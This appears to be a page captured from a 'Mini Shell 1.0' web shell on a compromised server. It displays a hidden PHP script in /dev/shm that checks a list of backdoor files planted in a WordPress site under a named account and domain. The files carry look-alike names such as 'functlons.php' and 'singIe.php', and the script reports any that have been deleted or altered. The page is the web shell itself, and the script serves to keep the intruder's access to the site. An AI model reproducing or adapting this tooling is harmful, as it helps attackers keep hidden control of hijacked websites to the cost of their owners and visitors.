HOME


Mini Shell 1.0
DIR: /dev/shm/
Upload File :
Current File : //dev/shm/.sym
<?php   $r = '/home/jahdeeve/public_html/tqhobbyz.com'; $x = ["/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Plugin/History/xml.php"=>"bd@@615460@@618",
"/wp-content/themes/bottom_1748020315/archlve.php"=>"bd@@257074@@727",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Log/users_add.php"=>"bd@@400734@@2145",
"/wp-content/themes/widget_area_1751112928/functlons.php"=>"bd@@599402@@727",
"/wp-content/plugins/slider-1748025482/functlons.php"=>"bd@@260498@@727",
"/wp-content/themes/error_404_1747416341/add_event.php"=>"bd@@3497@@605",
"/wp-content/themes/error_404_1747416341/connents.php"=>"bd@@938@@1166",
"/wp-content/themes/archives_1748009912/singIe.php"=>"bd@@247016@@727"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');